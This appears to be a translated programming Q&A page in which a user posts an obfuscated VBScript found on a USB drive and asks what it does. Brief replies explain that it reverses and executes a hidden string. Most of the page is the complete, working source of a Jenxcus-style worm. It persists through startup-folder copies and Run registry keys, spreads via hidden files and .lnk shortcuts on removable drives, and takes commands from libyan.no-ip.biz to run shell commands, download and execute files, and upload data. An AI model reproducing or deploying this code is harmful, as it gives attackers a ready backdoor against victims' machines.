有人可以探討我在內存中找到的VB腳本文件嗎？

帶有內存閃存中腳本文件的真實文件被隱藏起來，並與打開它們的.lnk文件鏈接，並同時運行腳本。
關於VBS/LNK.JENXCUS.Gen Trojan的防病毒警報。
代碼是做什麼的？它會在啓動文件夾中創建一個副本，即使當我刪除它時也是如此。
Dim zvn 
Dim dnqeqvrrc_ 
xs=("""") 
n=(vbcrlf) 
Function bnowmx() 

zvn=zvn&""&n&"noitcnuf dne"&n&"ynamorflladaer = llehsdmc"&n&"fi dne"&n&""&xs&""&xs&" = ynamorflladaer"&n&" esle"&n&"lladaer.rredts.cexeo = ynamorflladaer"&n&"neht maertsfodneta.rredts.cexeo ton fiesle"&n&"lladaer.tuodts.cexeo = ynamorflladaer"&n&"neht maertsfodneta.tuodts.cexeo ton fi"&n&")dmc & "&xs&" c/ %cepsmoc%"&xs&"(cexe.jbollehs = cexeo tes"&n&"ynamorflladaer,cexeo,jboptth mid"&n&")dmc(llehsdmc noitcnuf"&n&"bus dne"&n&"lru redlofeteled.jbo" 
zvn=zvn&"metsyselif"&n&"lru elifeteled.jbometsyselif"&n&"txen emuser rorre no"&n&")lru(fafeteled bus"&n&"bus dne"&n&"eurt,7,dip & "&xs&" DIP/ T/ F/ llikksat"&xs&" nur.jbollehs"&n&"txen emuser rorre no"&n&")dip(ssecorptixe bus"&n&"noitcnuf dne"&n&"txen"&n&"retilps & htapelbatucexe.metijbo & ssecorpmune = ssecorpmune"&n&""&xs&"|"&xs&" & dissecorp.metijbo & ssecorpmune = ssecorpmune "&n&""&xs&"|"&xs&" & eman.metijbo & ssecorpmune = ssecorpmune "&n&"smetiloc ni metijbo hcae rof"&n&"metijbo mid"&n&")84,,"&xs&"ssecorp_23niw morf * tceles"&xs&"(yreuqcexe.ecivresimwjbo = smetiloc tes"&n&")"&xs&"2vmic\toor\.\\:stmgmniw"&xs&"(tcejboteg = ecivresimwjbo tes"&n&"txen emuser rorre no"&n&")(ssecorpmune noitcnuf"&n&"noitcnuf dne"&n&"txen"&n&"retilps & setubirtta.elif & "&xs&"|"&xs&" & "&xs&"f"&xs&" & "&xs&"|"&xs&" & ezis.elif & "&xs&"|"&xs&" & eman.elif & fafmune = fafmune"&n&"selif.)ridmune(redlofteg.jbometsyselif ni elif hcae rof"&n&"txen"&n&"retilps & setubirtta.redlof & "&xs&"|"&xs&" & "&xs&"d"&xs&" & "&xs&"|"&xs&" & "&xs&""&xs&" & "&xs&"|"&xs&" & eman.redlof & fafmune = fafmune"&n&"sredlofbus.)ridmune(redlofteg.jbometsyselif ni redlof hcae rof"&n&"retilps & ridmune = fafmune"&n&")ridmune(fafmune noitcnuf"&n&"noitcnuF dne"&n&"txen"&n&"fi dne"&n&"retilps & epytevird.evird & "&xs&"|"&xs&" & htap.evird & revirdmune = revirdmune"&n&"neht eurt = ydaersi.evird fi"&n&"sevird.jbometsyselif ni evird hcae rof"&n&")(revirdmune noitcnuf"&n&"noitcnuf dne"&n&"reffub dnes.jboptth"&n&"eslaf ,lruelif & retilps & "&xs&"gnivcer-si"&xs&" & "&xs&"/"&xs&"& trop & "&xs&":"&xs&" & tsoh & "&xs&"//:ptth"&xs&","&xs&"tsop"&xs&" nepo.jboptth"&n&")"&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = jboptth tes"&n&"gni" 
zvn=zvn&"hton = daolnwodmaertsjbo tes"&n&"htiw dne"&n&"esolc. "&n&"daer. = reffub  "&n&"lruelif elifmorfdaol. "&n&"nepo."&n&" 1 = epyt."&n&" edaolpumaertsjbo htiw"&n&")"&xs&"maerts.bdoda"&xs&"(tcejboetaerc = edaolpumaertsjbo tes"&n&"reffub,edaolpumaertsjbo,jboptth mid"&n&")lruelif(daolpu noitcnuf"&n&"bus dne"&n&" fi dne"&n&"htaptrohs.)otevasrts(elifteg.daolnwodosfjbo nur.jbollehs"&n&"neht)otevasrts(stsixeelif.daolnwodosfjbo fi"&n&"fi dne"&n&"gnihton = daolnwodmaertsjbo tes"&n&"htiw dne "&n&"esolc.   "&n&"otevasrts elifotevas.  "&n&"ydobesnopser.daolnwodptthjbo etirw.  "&n&"nepo.  "&n&" 1 = epyt.   "&n&" daolnwodmaertsjbo htiw"&n&")"&xs&"maerts.bdoda"&xs&"(tcejboetaerc = daolnwodmaertsjbo tes "&n&"daolnwodmaertsjbo mid"&n&"neht 002 = sutats.daolnwodptthjbo fi"&n&"fi dne"&n&")otevasrts(elifeteled.daolnwodosfjbo"&n&"neht)otevasrts(stsixeelif.daolnwodosfjbo fi"&n&")"&xs&"tcejbometsyselif.gnitpircs"&xs&"(tcejboetaerc = daolnwodosfjbo tes"&n&"  "&n&""&xs&""&xs&" dnes.daolnwodptthjbo"&n&"eslaf ,lruelif & retilps & "&xs&"gnidnes-si"&xs&" & "&xs&"/"&xs&"& trop & "&xs&":"&xs&" & tsoh & "&xs&"//:ptth"&xs&","&xs&"tsop"&xs&" nepo.daolnwodptthjbo"&n&")"&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = daolnwodptthjbo tes"&n&")1 +)"&xs&"\"&xs&",lruelif(verrtsni ,lruelif(dim & ridelif = otevasrts"&n&"fi dne"&n&"ridllatsni = ridelif"&n&" neht "&xs&""&xs&" = ridelif fi"&n&")ridelif,lruelif(daolnwod bus"&n&"bus dne"&n&" fi dne"&n&"htaptrohs.)otevasrts(elifteg.daolnwodosfjbo nur.jbollehs"&n&"neht)otevasrts(stsixeelif.daolnwodosfjbo fi"&n&"fi dne"&n&"gnihton = daolnwodmaertsjbo tes"&n&"htiw dne"&n&"esolc.  "&n&"otevasrts elifote" 
zvn=zvn&"vas.  "&n&"ydobesnopser.daolnwodptthjbo etirw.  "&n&"nepo.  "&n&" 1 = epyt.  "&n&"daolnwodmaertsjbo htiw"&n&")"&xs&"maerts.bdoda"&xs&"(tcejboetaerc = daolnwodmaertsjbo tes"&n&"daolnwodmaertsjbo mid"&n&"neht 002 = sutats.daolnwodptthjbo fi"&n&" "&n&"fi dne"&n&")otevasrts(elifeteled.daolnwodosfjbo"&n&"neht)otevasrts(stsixeelif.daolnwodosfjbo fi"&n&")"&xs&"tcejbometsyselif.gnitpircs"&xs&"(tcejboetaerc = daolnwodosfjbo tes"&n&"dnes.daolnwodptthjbo"&n&"eslaf ,knilrts ,"&xs&"teg"&xs&" nepo.daolnwodptthjbo"&n&") "&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = daolnwodptthjbo tes"&n&"emanelif & ridllatsni = otevasrts"&n&"lruelif = knilrts"&n&")emanelif,lruelif(redaolnwodetis bus"&n&"noitcnuf dne"&n&"tiuq.tpircsw neht 0 > rebmun.rre fi"&n&")eslaf ,8, emanllatsni & ridllatsni(eliftxetnepo.jbometsyselif = ecnoeno tes"&n&"raelc.rre"&n&"fI dne"&n&" tiuq.tpircsw"&n&")43(rhC & emanllatsni & ridllatsni &)43(rhc & "&xs&" B// exe.tpircsw"&xs&" nur.jbollehs"&n&" neht)htaptrohs.trohsemanllufllatsni(esacl ><)htaptrohs.trohsemanlluftpircs(esacl fi"&n&")emanllatsni & ridllatsni(elifteg.jbometsyselif = trohsemanllufllatsni tes"&n&")emanlluftpircs.tpircsw(elifteg.jbometsyselif = trohsemanlluftpircs tes"&n&"tratspu"&n&"fI dne"&n&"fi dne"&n&""&xs&"ZS_GER"&xs&" ,gnidaerpsbsu ,"&xs&"\"&xs&" & )0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" etirwger.jbollehs"&n&"etad & "&xs&" - eslaf"&xs&" = gnidaerpsbsu"&n&"esle"&n&""&xs&"ZS_GER"&xs&" ,gnidaerpsbsu ,"&xs&"\"&xs&" & )0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" etirwger.jbollehs"&n&"etad" 
zvn=zvn&" & "&xs&" - eurt"&xs&" = gnidaerpsbsu"&n&"neht)emanllatsni(esacl & "&xs&"\:"&xs&" =))2,emanlluftpircs.tpircsw(dim (esacl fi"&n&"neht "&xs&""&xs&" = gnidaerpsbsu fi"&n&")"&xs&"\"&xs&" &)0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"(daerger.jbollehs = gnidaerpsbsu"&n&"txen emuser rorre no"&n&"ecnatsni noitcnuf"&n&"noitcnuf dne"&n&""&xs&"va-nan"&xs&" = ytiruces neht "&xs&""&xs&" = ytiruces fi"&n&"txen"&n&""&xs&". "&xs&" & emanyalpsid.surivitnajbo & ytiruces = ytiruces"&n&"surivitnaloc ni surivitnajbo hcae rof"&n&")0,"&xs&"lqw"&xs&","&xs&"tcudorpsurivitna morf * tceles"&xs&"(yreuqcexe.retnecytirucesjbo = surivitnaloc teS"&n&")cs & "&xs&"\toor\tsohlacol\\:stmgmniw"&xs&"(tcejboteg = retnecytirucesjbo tes"&n&""&xs&"retnecytiruces"&xs&" = cs esle "&xs&"2retnecytiruces"&xs&" = cs neht 6 > noisrevso fi"&n&")noisrevso(lave = noisrevso"&n&"txen"&n&")i(rtsnoisrev & noisrevso = noisrevso "&n&")rtsnoisrev(dnuobu ot 1 = x rof"&n&""&xs&"."&xs&" &)0(rtsnoisrev = noisrevso"&n&")"&xs&"."&xs&",noisrev.smetiloc(tilps = rtsnoisrev"&n&"txen"&n&")"&xs&"."&xs&",noisrev.metijbo(tilps = rtsnoisrev"&n&"smetiloc ni metijbo hcae rof"&n&")84,,"&xs&"metsysgnitarepo_23niw morf * tceles"&xs&"(yreuqcexe.ecivresimwjbo = smetiloc tes"&n&")"&xs&"2vmic\toor\.\\!}etanosrepmi=levelnoitanosrepmi{:stmgmniw"&xs&"(tcejboteg = ecivresimwjbo tes"&n&""&xs&""&xs&" = ytiruces"&n&"txen emuser rorre no"&n&" ytiruces noitcnuf"&n&"noitcnuf dne"&n&"txen"&n&"fi dne"&n&"rof tixe"&n&"rebmunlairesemulov.ksid = diwh"&n&"neht "&xs&""&xs&" >< rebmunlairesemulov.ksid fi"&n&"sksid ni ksid hcae rof"&n&")"&xs&"ksidlacigol_23niw morf * tceles"&xs&"(yreuqcexe.toor = sksid tes"&n&")" 
zvn=zvn&""&xs&"2vmic\toor\.\\!}etanosrepmi=levelnoitanosrepmi{:stmgmniw"&xs&"(tcejboteg = toor tes"&n&"txen emuser rorre no"&n&"diwh noitcnuf"&n&"bus dne"&n&"eurt, emanllatsni & putrats,emanlluftpircs.tpircsw elifypoc.jbometsyselif"&n&"eurt,emanllatsni & ridllatsni,emanlluftpircs.tpircsw elifypoc.jbometsyselif"&n&""&xs&"ZS_GER"&xs&" ,)43(wrhc & emanllatsni & ridllatsni &)43(wrhc & "&xs&" B// exe.tpircsw"&xs&" ,)0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" etirwger.jbollehs"&n&""&xs&"ZS_GER"&xs&" ,)43(wrhc & emanllatsni & ridllatsni &)43(wrhc & "&xs&" B// exe.tpircsw"&xs&" ,)0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\RESU_TNERRUC_YEKH"&xs&" etirwger.jbollehs"&n&"txeN emuser rorre no"&n&")(tratspu bus"&n&"noitcnuf dne"&n&"fi dne"&n&"fni = noitamrofni"&n&"esle"&n&" fni = noitamrofni"&n&"gnidaerpsbsu & fni = fni"&n&"retilps & ytiruces & fni = fni"&n&"retilps & "&xs&"sulp"&xs&" & fni = fni"&n&"txen"&n&"rof tixe"&n&" retilps & noitpac.ofniso & fni = fni"&n&"so ni ofniso hcae rof"&n&")"&xs&"metsysgnitarepo_23niw morf * tceles"&xs&"(yreuqcexe.toor = so tes"&n&")"&xs&"2vmic\toor\.\\!}etanosrepmi=levelnoitanosrepmi{:stmgmniw"&xs&"(tcejboteg = toor tes"&n&"retilps &)"&xs&"%emanresu%"&xs&"(sgnirtstnemnorivnednapxe.jbollehs & fni = fni"&n&" retilps &)"&xs&"%emanretupmoc%"&xs&"(sgnirtstnemnorivnednapxe.jbollehs & fni = fni"&n&" retilps & diwh = fni"&n&"neht "&xs&""&xs&" = fni fi"&n&"txen emuser rorre no"&n&"noitamrofni noitcnuf"&n&"noitcnuf dne"&n&"txetesnopser.jboptth =" 
zvn=zvn&" tsop"&n&"marap dnes.jboptth"&n&"noitamrofni,"&xs&":tnega-resu"&xs&" redaehtseuqertes.jboptth"&n&"eslaf ,dmc & "&xs&"/"&xs&"& trop & "&xs&":"&xs&" & tsoh & "&xs&"//:ptth"&xs&","&xs&"tsop"&xs&" nepo.jboptth"&n&"marap = tsop"&n&")marap, dmc(tsop noitcnuf"&n&"bus dne"&n&"tiuq.tpircsw"&n&"txen"&n&"fi dne"&n&"fi dne"&n&"fi dne"&n&"txen"&n&"0 = setubirtta.redlof"&n&"sredlofbus.) "&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni redlof hcae rof"&n&"txen"&n&"fi dne"&n&"fi dne"&n&")htap.elif(elifeteled.jbometsyselif"&n&"esle"&n&"fI dne"&n&")eman.elif & "&xs&"\"&xs&" & htap.evird(elifeteled.jbometsyselif"&n&"esle"&n&") "&xs&"knl."&xs&" &)0(emanelif & "&xs&"\"&xs&" & htap.evird(elifeteled.jbometsyselif"&n&")"&xs&"."&xs&",eman.elif(tilps = emanelif"&n&"neht)emanllatsni(esacu ><)eman.elif(esacu fi"&n&"0 = setubirtta.elif"&n&"neht "&xs&"knl"&xs&" ><))))"&xs&"."&xs&" ,eman.elif(tilps(dnuobu()"&xs&"."&xs&" ,eman.elif(tilps(esacl fi"&n&"neht)"&xs&"."&xs&",eman.elif(rtsni fi"&n&"txen emuser rorre no"&n&"selif.)"&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni elif hcae rof"&n&"neht 1 = epytevird.evird fi"&n&"neht 0 > ecapseerf.evird fi"&n&"neht eurt = ydaersi.evird fi"&n&"sevird.jbometsyselif ni evird hcae rof"&n&"eurt, emanlluftpircs.tpircsw elifeteled.jbometsyselif"&n&"eurt, emanllatsni & putrats elifeteled.jbometsyselif"&n&")0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\ENIHCAM_LACOL_YEKH"&xs&" eteledger.jbollehs"&n&")0()"&xs&"."&xs&",emanllatsni(tilps & "&xs&"\nur\noisrevtnerruc\swodniw\tfosorcim\erawtfos\RESU_TNERRUC_YEKH"&xs&" eteledger.jbollehs"&n&"emanredlof mid"&n&"emanelif mid"&n&"txen e" 
zvn=zvn&"muser rorre no"&n&"llatsninu bus"&n&"bus dne"&n&"raelc.rre"&n&"txen"&n&"fi dne"&n&"fI dne"&n&"fI dne"&n&"txen"&n&")(evas.jboknl"&n&"fi dne"&n&"nociredlof = noitacolnoci.jboknl"&n&" esle"&n&"htap.redlof = noitacolnoci.jboknl"&n&"neht 0 =)"&xs&","&xs&",nociredlof(rtsni fi"&n&")"&xs&"\nocitluafed\redlof\sessalc\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"(daerger.jbollehs = nociredlof"&n&""&xs&"tixe&"&xs&"&))43(wrhc & "&xs&" "&xs&" &)43(wrhc ,"&xs&" "&xs&",eman.redlof(ecalper & "&xs&" rerolpxe trats&"&xs&" &))43(wrhc & "&xs&" "&xs&" &)43(wrhc ,"&xs&" "&xs&",emanllatsni(ecalper & "&xs&" trats c/"&xs&" = stnemugra.jboknl"&n&""&xs&""&xs&" = yrotceridgnikrow.jboknl"&n&""&xs&"exe.dmc"&xs&" = htaptegrat.jboknl"&n&"7 = elytswodniw.jboknl"&n&")"&xs&"knl."&xs&" & emanredlof & "&xs&"\"&xs&" & htap.evird(tuctrohsetaerc.jbollehs = jboknl tes"&n&"eman.redlof = emanredlof"&n&"4+2 = setubirtta.redlof"&n&"rof tixe neht redlofknl ton fi"&n&"sredlofbus.) "&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni redlof hcae rof"&n&"txen"&n&"fi dne"&n&"fi dne"&n&"fi dne"&n&")(evas.jboknl"&n&"fi dne"&n&"nocielif = noitacolnoci.jboknl"&n&" esle"&n&"htap.elif = noitacolnoci.jboknl"&n&"neht 0 =)"&xs&","&xs&",nocielif(rtsni fi"&n&")"&xs&"\nocitluafed\"&xs&" &)"&xs&"\"&xs&" &)))"&xs&"."&xs&" ,eman.elif(tilps(dnuobu()"&xs&"."&xs&" ,eman.elif(tilps & "&xs&".\sessalc\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"(daerger.jbollehs & "&xs&"\sessalc\erawtfos\ENIHCAM_LACOL_YEKH"&xs&"(daerger.jbollehs = nocielif"&n&""&xs&"tixe&"&xs&"&))43(wrhc & "&xs&" "&xs&" &)43(wrhc ,"&xs&" "&xs&",eman.elif(ecalper & "&xs&" trats&"&xs&" &))43(wrhc & "&xs&" "&xs&" &)43(wrhc ,"&xs&" "&xs&",emanllatsni(ecalper & "&xs&" trats c/"&xs&" = stnemugra.jboknl"&n&""&xs&""&xs&" = yrotceridgnikrow.jboknl"&n&""&xs&"ex" 
zvn=zvn&"e.dmc"&xs&" = htaptegrat.jboknl"&n&"7 = elytswodniw.jboknl"&n&")"&xs&"knl."&xs&" &)0(emanelif & "&xs&"\"&xs&" & htap.evird(tuctrohsetaerc.jbollehs = jboknl tes"&n&")"&xs&"."&xs&",eman.elif(tilps = emanelif"&n&"neht)emanllatsni(esacu ><)eman.elif(esacu fi"&n&"4+2 = setubirtta.elif"&n&"neht "&xs&"knl"&xs&" ><))))"&xs&"."&xs&" ,eman.elif(tilps(dnuobu()"&xs&"."&xs&" ,eman.elif(tilps(esacl fi"&n&"neht)"&xs&"."&xs&",eman.elif(rtsni fi"&n&"rof tixe neht elifknl ton fi"&n&"seliF.) "&xs&"\"&xs&" & htap.evird (redlofteg.jbometsyselif ni elif hcae rof"&n&"fi dne"&n&"4+2 = setubirtta.)emanllatsni & "&xs&"\"&xs&" & htap.evird(elifteg.jbometsyselif"&n&"neht )emanllatsni & "&xs&"\"&xs&" & htap.evird(stsixeelif.jbometsyselif fi"&n&"eurt,emanllatsni & "&xs&"\"&xs&" & htap.evird , emanlluftpircs.tpircsw elifypoc.jbometsyselif"&n&"neht 1 = epytevird.evird fi"&n&"neht 0 > ecapseerf.evird fi"&n&"neht eurt = ydaersi.evird fi"&n&"sevird.jbometsyselif ni evird hcae rof"&n&"tratspu"&n&"nociredlof mid"&n&"nocielif mid"&n&"emanredlof mid"&n&"emanelif mid"&n&"jboknl mid"&n&"txen emuser rorre no"&n&"llatsni bus"&n&"dnew"&n&"peels peels.tpircsw"&n&"tceles dne"&n&"  )marap(lave = peels"&n&")1(dmc = marap"&n&""&xs&"peels"&xs&" esac"&n&")marap(ssecorptixe"&n&")1(dmc = marap"&n&""&xs&"ssecorp-tixe"&xs&" esac"&n&")marap(fafeteled"&n&")1(dmc = marap"&n&""&xs&"eteled"&xs&" esac"&n&" )marap(llehsdmc,"&xs&"llehs-dmc-si"&xs&" tsop"&n&")1(dmc = marap"&n&""&xs&"llehs-dmc"&xs&" esac"&n&" ssecorpmune,"&xs&"ssecorp-mune-si"&xs&" tsop"&n&""&xs&"ssecorp-mune"&xs&" esac"&n&")marap(fafmune,"&xs&"faf-mune-si"&xs&" tsop"&n&")1(dmc = marap"&n&""&xs&"faf-mune"&xs&" esac"&n&" revirdmune,"&xs&"revir" 
zvn=zvn&"d-mune-si"&xs&" tsop"&n&""&xs&"revird-mune"&xs&" esac"&n&")marap(daolpu"&n&")1(dmc = marap"&n&""&xs&"vcer"&xs&" esac"&n&")2(dmc,)1(dmc redaolnwodetis"&n&""&xs&"dnes-etis"&xs&" esac"&n&")2(dmc,)1(dmc daolnwod"&n&""&xs&"dnes"&xs&" esac"&n&"llatsninu"&n&""&xs&"llatsninu"&xs&" esac"&n&" tiuq.tpircsw"&n&")43(rhc & emanllatsni & ridllatsni &)43(rhc & "&xs&" B// exe.tpircsw"&xs&" nur.jbollehs"&n&"esolc.ecnoeno"&n&"marap etirw.ecnoeno"&n&")eslaf ,2, emanllatsni & ridllatsni(eliftxetnepo.jbometsyselif = ecnoeno tes"&n&"esolc.ecnoeno"&n&")1(dmc = marap"&n&""&xs&"etadpu"&xs&" esac"&n&"marap etucexe"&n&")1(dmc = marap"&n&""&xs&"etucecxe"&xs&" esac"&n&")0(dmc esac tceles"&n&")retilps,esnopser(tilps = dmc"&n&")"&xs&""&xs&","&xs&"ydaer-si"&xs&"(tsop = esnopser"&n&""&xs&""&xs&" = esnopser"&n&"llatsni"&n&"eurt elihw"&n&"ecnatsni"&n&"txen emuser rorre no"&n&"ecnoeno mid"&n&""&xs&""&xs&" = etadtrats"&n&""&xs&""&xs&" = gnidaerpsbsu"&n&""&xs&""&xs&" = ofni"&n&"marap mid"&n&"dmc mid"&n&"esnopser mid"&n&" 0005 = peels"&n&""&xs&">"&xs&" & "&xs&"|"&xs&" & "&xs&"<"&xs&" = retilps"&n&""&xs&"\"&xs&" &)"&xs&"%pmet%"&xs&"(sgnirtstnemnorivnednapxe.jbollehs = ridllatsni neht)ridllatsni(stsixeredlof.jbometsyselif ton fi"&n&""&xs&"\"&xs&" &)ridllatsni(sgnirtstnemnorivnednapxe.jbollehs = ridllatsni"&n&""&xs&"\"&xs&" &)"&xs&"putrats"&xs&"(sredloflaiceps.jbollehs = putrats"&n&"emantpircs.tpircsw = emanllatsni"&n&")"&xs&"ptthlmx.2lmxsm"&xs&"(tcejboetaerc = jboptth tes"&n&"jboptth mid"&n&")"&xs&"tcejbometsyselif.gnitpircs"&xs&"(tcejboetaerc = jbometsyselif tes"&n&"jbometsyselif mid"&n&")"&xs&"llehs.tpircsw"&xs&"(tcejboetaerc.tpircsw = jbollehs tes"&n&" jbollehs mid"&n&"eurt = redlofknl"&n&"eurt = elifknl"&n&""&xs&"%pmet%"&xs&" = ridllatsni"&n&"7711 = trop"&n&""&xs&"zib.pi-on.naybil"&xs&" = tsoh"&n&"reDoCXdaME'" 

for azcujbz=(((len)(zvn)))to(1)Step(-1) 
ypqmwkll=(mid(zvn,azcujbz,1)) 
dnqeqvrrc_=(dnqeqvrrc_&ypqmwkll&szauuy_l_vr) 
next 
bnowmx=dnqeqvrrc_ 
End Function 
Executeglobal(cstr(bnowmx())) 
'EMadXCoDer,www.dev-point.com
來源
2015-10-27 Ahmed
我投票結束這個問題作爲題外話，因爲它不是一個關於編程問題的問題。 – Smandoli
可能有些惡意。不一定。它只是嚴重混淆。儘管如此，仍然表示同意。 – CollinD
它產生一個字符串，然後反轉它，然後執行反轉的字符串。您可以用消息框替換executeglobal以查看即將執行的代碼。但這不是問題！問題是它太晚了。如果在刪除它時繼續重新創建，那麼您的系統已經受到感染。 –
該代碼將自身安裝到用戶的啓動文件夾中，然後設置兩個運行註冊表項以在機器啓動時執行該腳本。運行時，腳本啓動一個永久執行的循環。每次通過循環它重新安裝自己，然後打開一個套接字到libyan.no-ip.biz並要求說明。響應指令可以是許多事情，包括讓腳本發送驅動器上的信息或下載並執行任意代碼。
來源
2015-10-27 21:23:19
有人可以探討我在內存中找到的VB腳本文件嗎？

回答

相關問題
